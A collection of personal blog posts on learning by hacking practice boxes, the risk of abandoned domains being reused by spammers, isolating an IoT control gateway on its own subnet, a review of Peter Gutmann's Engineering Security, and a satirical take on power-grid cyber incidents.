But above all, hacking boxes is simply addictive in a way that cannot be fully explained. It is like reading novels about mysteries and secret passages. Maybe this is what computer games are to some people. Some commentators say that machines on pentesting platforms are are more Capture-the-Flag-like (CTF) rather than real-world pentesting. It is true that some challenges have a ‘story line’ that takes you from one solved puzzle to the next one. To some extent a part of the challenge has to be fabricated as there are no real users to social engineer. But there are very real-world machines on hackthebox, e.g. requiring you to escalate one one object in a Windows domain to another.

And if you ever have seen what stuff is stored in clear text in the real world, or what passwords might be used ‘just for testing’ (and never changed) – then also the artificial guess-the-password challenges do not appear that unrealistic. I want to emphasize that I am not the one to make fun of weak test passwords and the like at all. More often than not I was the one whose job was to get something working / working again, under pressure. Sometimes it is not exactly easy to ‘get it working’ quickly, in an emergency, and at the same time considering all security implications of the ‘fix’ you have just applied – by thinking like an attacker. hackthebox is an excellent platform to learn that, so I cannot recommend it enough!

An article about hacking is not complete if it lacks a clichéd stock photo! I am searching for proper hacker’s attire now – this was my first find!

Infinite Loop: Theory and Practice Revisited.

I’ve unlocked a new achievement as a blogger, or a new milestone as a life-form. As a dinosaur telling the same old stories over and over again.

I started drafting a blog post, as I always do since a while: I do it in my mind only, twist and turn in for days or weeks – until I am ready to write it down in one go. Today I wanted to release a post called On Learning (2) or the like. I knew I had written an early post with a similar title, so I expected this to be a loosely related update. But then I checked the old On Learning post: I found not only the same general ideas but the same autobiographical anecdotes I wanted to use now – even  in the same order.

2014 I had looked back on being both a teacher and a student for the greater part of my professional life, and the patterns were always the same – be the field physics, engineering, or IT security. I had written this post after a major update of our software for analyzing measurement data. This update had required me to acquire new skills, which was a delightful learning experience. I tried to reconcile very different learning modes: ‘Book learning’ about so-called theory, including learning for the joy of learning, and solving problems hands-on based on the minimum knowledge absolutely required.

It seems I like to talk about the The Joys of Theory a lot – I have meta-posted about theoretical physics in general, more than oncegeneral relativity as an example, and about computer science. I searched for posts about hands-on learning now – there aren’t any. But every post about my own research and work chronicles this hands-on learning in a non-meta explicit way. These are the posts listed on the heat pump / engineering page,  the IT security / control page, and some of the physics posts about the calculations I used in my own simulations.

Now that I am wallowing in nostalgia and scrolling through my old posts I feel there is one possibly new insight: Whenever I used knowledge to achieve a result that I really needed to get some job done, I think about this knowledge as emerging from hands-on tinkering and from self-study. I once read that many seasoned software developers also said that in a survey about their background: They checked self-taught despite having university degrees or professional training.

This holds for the things I had learned theoretically – be it in a class room or via my morning routine of reading textbooks. I learned about differential equations, thermodynamics, numerical methods, heat pumps, and about object-oriented software development. Yet when I actually have to do all that, it is always like re-learning it again in a more pragmatic way, even if the ‘class’ was very ‘applied’, not much time had passed since learning only, and I had taken exams. This is even true for the archetype all self-studied disciplines – hacking. Doing it – like here  – white-hat-style ;-) – is always a self-learning exercise, and reading about pentesting and security happens in an alternate universe.

The difference between these learning modes is maybe not only in ‘the applied’ versus ‘the theoretical’, but it is your personal stake in the outcome that matters – Skin In The Game. A project done by a group of students for the final purpose of passing a grade is not equivalent to running this project for your client or for yourself. The point is not if the student project is done for a real-life client, or the task as such makes sense in the real world. The difference is whether it feels like an exercise in an gamified system, or whether the result will matter financially / ‘existentially’ as you might try to empress your future client or employer or use the project results to build your own business. The major difference is in weighing risks and rewards, efforts and long-term consequences. Even ‘applied hacking’ in Capture-the-Flag-like contests is different from real-life pentesting. It makes all the difference if you just loose ‘points’ and miss the ‘flag’, or if you inadvertently take down a production system and violate your contract.

So I wonder if the Joy of Theoretical Learning is to some extent due to its risk-free nature. As long as you just learn about all those super interesting things just because you want to know – it is innocent play. Only if you finally touch something in the real world and touching things has hard consequences – only then you know if you are truly ‘interested enough’.

Sorry, but I told you I will post stream-of-consciousness-style now and then :-)

I think it is OK to re-use the image of my beloved pre-1900 physics book I used in the 2014 post:

The Orphaned Internet Domain Risk

I have clicked on company websites of social media acquaintances, and something is not right: Slight errors in formatting, encoding errors for special German characters.

Then I notice that some of the pages contain links to other websites that advertize products in a spammy way. However, the links to the spammy sites are embedded in this alleged company websites in a subtle way: Using the (nearly) correct layout, or  embedding the link in a ‘news article’ that also contains legit product information – content really related to the internet domain I am visiting.

Looking up whois information tells me that these internet domain are not owned by my friends anymore – consistent with what they actually say on the social media profiles. So how come that they ‘have given’ their former domains to spammers? They did not, and they didn’t need to: Spammers simply need to watch out for expired domains, seize them when they are available – and then reconstruct the former legit content from public archives, and interleave it with their spammy messages.

The former content of legitimate sites is often available on the web archive. Here is the timeline of one of the sites I checked:

Clicking on the details shows:

  • Last display of legit content in 2008.
  • In 2012 and 2013 a generic message from the hosting provider was displayed: This site has been registered by one of our clients
  • After that we see mainly 403 Forbidden errors – so the spammers don’t want their site to be archived – but at one time a screen capture of the spammy site had been taken.

The new site shows the name of the former owner at the bottom but an unobtrusive link had been added, indicating the new owner – a US-based marketing and SEO consultancy.

So my take away is: If you ever feel like decluttering your websites and free yourself of your useless digital possessions – and possibly also social media accounts, think twice: As soon as your domain or name is available, somebody might take it, and re-use and exploit your former content and possibly your former reputation for promoting their spammy stuff in a shady way.

This happened a while ago, but I know now it can get much worse: Why only distribute marketing spam if you can distribute malware through channels still considered trusted? In this blog post Malwarebytes raises the question if such practices are illegal or not – it seems that question is not straight-forward to answer.

Visitors do not even have to visit the abandoned domain explicitly to get hacked by malware served. I have seen some reports of abandoned embedded plug-ins turned into malicious zombies. Silly example: If you embed your latest tweets, Twitter goes out-of-business, and its domains are seized by spammers – you Follow Me icon might help to spread malware.

If a legit site runs third-party code, they need to trust the authors of this code. For example, Equifax’ website recently served spyware:

… the problem stemmed from a “third-party vendor that Equifax uses to collect website performance data,” and that “the vendor’s code running on an Equifax Web site was serving malicious content.”

So if you run any plug-ins, embedded widgets or the like – better check out regularly if the originating domain is still run by the expected owner – monitor your vendors often; and don’t run code you do not absolutely need in the first place. Don’t use embedded active badges if a simple link to your profile would do.

Do a painful boring inventory and assessment often – then you will notice how much work it is to manage these ‘partners’ and rather stay away from signing up and registering for too much services.

Update 2017-10-25: And as we speak, we learn about another example – snatching a domain used for a Dell backup software, preinstalled on PCs.

Give the ‘Thing’ a Subnet of Its Own!

To my surprise, the most clicked post ever on this blog is this:

Network Sniffing for Everyone:
Getting to Know Your Things (As in Internet of Things)

… a step-by-step guide to sniff the network traffic of your ‘things’ contacting their mothership, plus a brief introduction to networking. I wanted to show how you can trace your networked devices’ traffic without any specialized equipment but being creative with what many users might already have, by turning a Windows PC into a router with Internet Connection Sharing.

Recently, an army of captured things took down part of the internet, and this reminded me of this post. No, this is not one more gloomy article about the Internet of Things. I just needed to use this Internet Sharing feature for the very purpose it was actually invented.

The Chief Engineer had finally set up the perfect test lab for programming and testing freely programmable UVR16x2 control systems (successor of UVR1611). But this test lab was located in a spot not equipped with wired ethernet, and the control unit’s data logger and ethernet gateway, so-called CMI (Control and Monitoring Interface), only has a LAN interface and no WLAN.

So an ages-old test laptop was revived to serve as a router (improving its ecological footprint in passing): This notebook connects to the standard ‘office’ network via WLAN: This wireless connection is thus the internet connection that can be shared with a device connected to the notebook’s LAN interface, e.g. via a cross-over cable. As explained in detail in the older article the router-laptop then allows for sniffing the traffic – but above all it allows the ‘thing’ to connect to the internet at all.

This is the setup:

Using a notebook with Internet Connection Sharing enabled as a router to connect CMI (UVR16x2's ethernet gatway) to the internet

The router laptop is automatically configured with IP address 192.168.137.1 and hands out addresses in the 192.168.137.x network as a DHCP server, while using an IP address provided by the internet router for its WLAN adapter (indicated here as commonly used 192.168.0.x addresses). If Windows 10 is used on the router-notebook, you might need to re-enable ICS after a reboot.

The control unit is connected to the CMI via CAN bus – so the combination of test laptop, CMI, and UVR16x2 control unit is similar to the setup used for investigating CAN monitoring recently.

The CMI ‘thing’ is tucked away in a private subnet dedicated to it, and it cannot be accessed directly from any ‘Office PC’ – except the router PC itself. A standard office PC (green) effectively has to access the CMI via the same ‘cloud’ route as an Internet User (red). This makes the setup a realistic test for future remote support – when the CMI plus control unit has been shipped to its proud owner and is configured on the final local network.

The private subnet setup is also a simple workaround in case several things can not get along well with each other: For example, an internet TV service flooded CMI’s predecessor BL-NET with packets that were hard to digest – so BL-NET refused to work without a further reboot. Putting the sensitive device in a private subnet – using a ‘spare part’ router, solved the problem.

The Chief Engineer's quiet test lab for testing and programming control units

What I Never Wanted to Know about Security but Found Extremely Entertaining to Read

This is in praise of Peter Gutmann‘s book draft Engineering Security, and the title is inspired by his talk Everything You Never Wanted to Know about PKI but were Forced to Find Out.

Chances are high that any non-geek reader is already intimidated by the acronym PKI – sharing the links above on LinkedIn I have been asked Oh. Wait. What the %&$%^ is PKI??

This reaction is spot-on as this post is more about usability and perception of technology by end-users despite or because I have worked for more than 10 years at the geeky end of Public Key Infrastructure. In summary, PKI is a bunch (actually a ton) of standards that should allow for creating the electronic counterparts of signatures, of issuing passports, of transferring data in locked cabinets. It should solve all security issues basically.

The following images from Peter Gutmann’s book  might invoke some memories.

Security warnings designed by geeks look like this:

Peter Gutmann, Engineering Security, certificate warning - What the developers wrote

Peter Gutmann, Engineering Security, book draft, available at https://www.cs.auckland.ac.nz/~pgut001/pubs/book.pdf, p.167. Also shown in Things that Make us Stupid, https://www.cs.auckland.ac.nz/~pgut001/pubs/stupid.pdf, p.3.

As a normal user, you might rather see this:

Peter Gutmann, Engineering Security, certificate warning - What the user sees

Peter Gutmann, Engineering Security, book draft, available at https://www.cs.auckland.ac.nz/~pgut001/pubs/book.pdf, p.168.

The funny thing was that I picked this book to take a break from books on psychology and return to the geeky stuff – and then I was back to all kinds of psychological biases and Kahneman’s Prospect Theory for example.

What I appreciate in particular is the diverse range of systems and technologies considered – Apple, Android, UNIX, Microsoft,…, all evaluated agnosticly, plus a diverse range of interdisciplinary research considered. Now that’s what I call true erudition with a modern touch. Above all, I enjoyed the conversational and irreverent tone – I have never started reading a book for technical reasons and then was not able to put it down because it was so entertaining.

My personal summary – which resonates a lot with my experience – is:
On trying to make systems more secure you might not only make them more unusable and obnoxious but also more insecure.

A concise summary is also given in Gutmann’s talk Things that Make Us Stupid. I liked in particular the ignition key as a real-world example for a device that is smart and easy-to-use, and providing security as a by-product – very different from interfaces of ‘security software’.

Peter Gutmann is not at all siding with ‘experts’ who always chide end-users for being lazy and dumb – writing passwords down and stick the post-its on their screens – and who state that all we need is more training and user awareness. Normal users use systems to get their job done and they apply risk management in an intuitive way: Should I waste time in following an obnoxious policy or should I try to pass that hurdle as quick as possible to do what I am actually paid for?

Geeks are weird – that’s a quote from the lecture slides linked above. Since Peter Gutmann is an academic computer scientist and obviously a down-to-earth practitioner with ample hands-on experience – which would definitely qualify him as a Geek God – his critique is even more convincing. In the book he quotes psychological research which prove that geeks really think different (as per standardized testing of personality types). Geeks constitute a minority of people (7%) that tend to take decisions – such as Should I click that pop-up? – in a ‘rational’ manner, as the simple and mostly wrong theories on decision making have proposed. One example Gutmann uses is testing for basic understanding of logics, such as Does ‘All X are Y’ imply ‘Some X are Y’? Across cultures the majority of people thinks that this is wrong.

Normal people – and I think also geeks when they don’t operate in geek mode, e.g. in the wild, not in their programmer’s cave – fall for many so-called fallacies and biases.

Our intuitive decision making engine runs on autopilot and we get conditioned to click away EULAs, or next-next-finish the dreaded install wizards, or click away pop-ups, including the warnings. As users we don’t generate testable hypotheses or calculate risks but act unconsciously based on our experience what had worked in the past – and usually the click-away-anything approach works just fine. You would need US navy-style constant drilling in order to be alert enough not to fall for those fallacies. This does exactly apply to anonymous end users using their home PCs to do online-banking.

Security indicators like padlocks and browser address bar colors change with every version of popular browsers. Not even tech-savvy users are able to tell from those indicators if they are ‘secure’ now. But what it is extremely difficult: Users would need to watch out for the lack of an indicator (that’s barely visible when it’s there). And we are – owing to confirmation bias – extremely bad at spotting the negative, the lack of something. Gutmann calls this the Simon Says problem.

It is intriguing to see how biases about what ‘the others’ – the users or the attackers – would do enter technical designs. For example it is often assumed that a client machine or user who has authenticated itself is more trustworthy – and servers are more vulnerable to a malformed packet sent after successful authentication. In the Stuxnet attack digitally signed malware (signed by stolen keys) that has been used – ‘if it’s signed it has to be secure’.

To make things worse users are even conditioned for ‘insecure’ behavior: When banks use all kinds fancy domain names to market their latest products, they lure their users into clicking on links to that fancy sites in e-mails and have them logon with their banking user accounts via these sites they train users to fall for phishing e-mails – despite the fact that the same e-mails half-heartedly warn about clicking arbitrary links in e-mails.

I believe in relation to systems like PKI – that require you run some intricate procedures every few years only (these are called ceremonies for a reason) – also admins should also be considered ‘users’.

I have spent many hours in discussing proposed security features like Passwords need to be impossible to remember and never written down with people whose job it is to audit, draft policies, and read articles on what Gutmann calls conference-paper-attacks all the day. These are not the people who have to run systems, deal with helpdesk calls or costs, and with requests from VIP users as top level managers who had on the one hand been extremely paranoid about system administrators sniffing their e-mails but yet on the other hand need instant 24/7 support with recovery of encrypted e-mails (This should be given a name like the Top Managers’ Paranoia Paradox)

As a disclaimer I’d like to add that I don’t underestimate cyber security threats, risk management, policies etc. It is probably the current media hype on governments spying on us that makes me advocate a contrarian view.

I could back this up by tons of stories, many of them too good to be made up (but unfortunately NDA-ed): security geeks in terms of ‘designers’ and ‘policy authors’ often underestimate time and efforts required in running their solutions on a daily basis. It is often the so-called trivial and simple things that go wrong, such as: The documentation of that intricate process to be run every X years cannot be found, or the only employee who really knew about the interdependencies is long gone, or allegedly simple logistics that go wrong (Now we are locked in the secret room to run the key ceremony… BTW did anybody think of having the media ready to install the operating system on that high secure isolated machine?).

A large European PKI setup failed (it made headlines) because the sacred key of a root certification authority had been destroyed – which is the expected behavior for so-called Hardware Security Modules when they are tampered with or at least the sensors say so, and there was no backup. The companies running the project and running operations blamed each other.

I am not quoting this to make fun of others – I made enough blunders myself. The typical response to this often is: Projects or operations have been badly managed and you just need to throw more people and money on them to run secure systems in a robust and reliable way. This might be true but it does simply not reflect the typical budget, time constraints, and lack of human resources typical IT departments of corporations have to deal with.

There is often a very real, palpable risk of trading off business continuity and availability (that is: safety) for security.

Again I don’t want to downplay risks associated with broken algorithms and the NSA reading our e-mail. But as Peter Gutmann points out cryptography is the last thing an attacker would target (even if a conference-paper attack had shown it is broken) – the implementation of cryptography rather guides attackers along the lines of where not to attack. Just consider the spectacular recent ‘hack’ of a prestigious one-letter Twitter account which was actually blackmailing the user after having gained control over a user’s custom domain through social engineering – of most likely underpaid call-center agents who had to face that dilemma of meeting the numbers in terms of customer satisfaction versus following the security awareness training they might have had.

Needless to say, encryption, smart cards, PKI etc. would not have prevented that type of attack.

Peter Gutmann says about himself he is throwing rocks at PKIs, and I believe you can illustrate a particularly big problem using a perfect real-live metaphor: Digital certificates are like passports or driver licenses to users – signed by a trusted agency.

Now consider the following: A user might commit a crime and his driver license is seized. PKI’s equivalent of that seizure is to have the issuing agency publishing a black list regularly, listing all the bad guys. Police officers on the road need to have access to that blacklist in order to check drivers’ legitimacy. What happens if a user isn’t blacklisted but the blacklist publishing service is not available? The standard makes this check optional (as many other things which is the norm when an ancient standard is retrofitted with security features) but let’s assume the police app follows the recommendation what they SHOULD do.  If the list is unavailable the user is considered and alleged criminal and has to exit the car.

You could also imagine something similar happening to train riders who have printed out an online ticket that cannot be validated (e.g. distinguished from forgery) by the conductor due to a failure in the train’s IT systems.

Any ’emergency’ / ‘incident’ related to digital certificates I was ever called upon to support with was related to false negative blocking users from doing what they need to do because of missing, misconfigured or (temporarily) unavailable certificate revocation lists (CRLs). The most important question in PKI planning is typically how to workaround or prevent inaccessible CRLs. I am aware of how petty this problem may appear to readers – what’s the big deal in monitoring a web server? But have you ever noticed how many alerts (e.g. via SMS) a typical administrator gets – and how many of them are false negatives? When I ask what will happen if the PKI / CRL signing / the web server breaks on Dec. 24 at 11:30 (in a European country) I am typically told that we need to plan for at least some days until recovery. This means that revocation information on the blacklist will be stale, too, as CRLs can be cached for performance reasons.

As you can imagine most corporations rather tend to follow the reasonable approach of putting business continuity over security so they want to make sure that a glitch in the web server hosting that blacklists will not stop 10.000 employees from accessing the wireless LAN, for example. Of course any weird standard can be worked around given infinite resources. The point I wanted to make was that these standards have been designed having something totally different in mind, by PKI Theologians in the 1980s.

Admittedly though, digitally certificates and cryptography make for a great playground for geeks. I think I was a PKI theologian myself many years ago until I rather morphed in what I call anti-security consultant tongue-in-cheek – trying to help users (and admins) to keep on working despite new security features. I often advocated for not using certificates and proposing alternative approaching boiling down the potential PKI project to a few hours of work, against the typical consultant’s mantra of trying to make yourself indispensable in long-term projects and by designing blackboxes the client will never be able to operate on his own. Not only because of the  PKI overhead but because alternatives were as secure – just not as hyped.

So in summary I am recommending Peter Gutmann’s terrific resources (check out his Crypto Tutorial, too!) to anybody who is torn between geek enthusiasm for some obscure technology and questioning its value nonetheless.

Rusty Padlock

No post on PKI, certificates and key would be complete without an image like this.I found the rusty one particularly apt here. (Wikimedia, user Garretttaggs)

Cyber Security Satire?

I am a science fiction fan. In particular, I am a fan of movies featuring Those Lonesome Nerds who are capable of controlling this planet’s critical infrastructure – from their gloomy basements.

But is it science fiction? In the year Die Hard 4.0 has been released a classified video – showing an electrical generator dying from a cyber attack. Fortunately, “Aurora” was just a test attack against a replica of a power plant.

Now some of you know that the Subversive El(k)ement calls herself a Dilettante Science Blogger on Twitter.

But here is an epic story to be unearthed, and it would take a novelist to do that. I can imagine the long-winded narrative unfolding – of people who cannot use their showers or toilets any more after the blackout. Of sinister hackers sending their evil commands into the command centers of the intricate blood circulation of our society we call The Power Grid. Of course they use smart meters to start their attack.

Unfortunately my feeble attempts of tipping my toes into novel writing have been crashed before I even got started: This novel does exist already – in German. I will inform you if is has been translated – either to a novel or directly into a Hollywood movie script.

As I am probably not capable of writing a serious thriller anyway I would rather go for dark satire.

Douglas Adams did cover so many technologies in The Hitchhiker’s Guide the Galaxy – existing and imagined ones – but he did not elaborate much on intergalactic power transmission. So here is room for satire.

What if our Most Critical Infrastructure would not be attacked by sinister hacker nerds but by our smart systems’ smartness dumbness? (Or their operators’ ?)

To all you silent readers and idea grabbers out there: Don’t underestimate the cyber technology I had built into that mostly harmless wordpress.com blog: I know all of you who are reading this and if you are going to exploit this idea on behalf of me I will time-travel back and forth and ruin your online reputation.

That being said I start crafting the plot:

As Adams probably drew his inspiration from encounters with corporations and bureaucracy when describing the Vogons and InfiniDim enterprises I will extrapolate my cyber security nightmare from an anecdote – one that actually happenend!

Consider a programmer – a geek – trying to test his code. Sorry for the gender stereotype. As a geekess I am allowed to do this. It could be female geek also!

The geek’s code should send messages to other computers in a Windows domain. “Domain” is a technical term, not some geeky reference to Dominion or the like.  He is using net send. Info for Generation Y-ers and other tablet and smartphone freak: This is like social media status message junk lacking images.

But our geek protagonist makes a small mistake: He does not send the test command to his test computer only – but to “EUROPE”. This does nearly refer to the whole continent, actually it addresses all computers in all European subsidiaries of a true Virtual Cyber Empire.

Fortunately modern IT networks are built on nearly AI powered devices called switches which make the cyber attack petering out at the borders of That Large City.

How could we turn this into a story about an attack on the power grid, adding your typical ignorant non-tech sensationalist writer’s cliched ideas:

  1. A humanoid life-form (or flawed android that tests his emotions chip) is tinkering with sort of a Hello World! command – sent to The Whole World literally.
  2. The attack that is just a glitch, an unfortunate concatenation of events, that is been launched in an unrelated part of the cyber space. E.g. by a command displayed on a hacker’s screen in a Youtube video. Or it was launched from the gas grid.
  3. The Command of Death spreads pandemically over the continent, replicating itself more efficiently than cute cat videos on social networks.

I contacted my agent immediately.

Shattering my enthusiasm she told me:

This is not science-fiction – this is simply boring. Something like that happened recently in a small country in the middle of Europe.

According to this country’s news a major power blackout had barely been avoided in May 2013. Engineers needed to control the delicate balance of power supply and demand manually as the power grid’s control system has been flooded with gibberish – data that could not be interpreted.

The alleged originator of these commands was a gas transmission system operator in the neighboring country. This company tested a new control system and tried to poll all of its meters for a status update.  Somehow the command found its way from the gas grid to the European power grid and has been replicated.

_________________________

Update –  Bonus material – making of: For the first time I felt the need to tell this story twice – in German and in English. This is not a translation, rather different versions in parallel universes. German-speaking readers – this is the German instance of the post.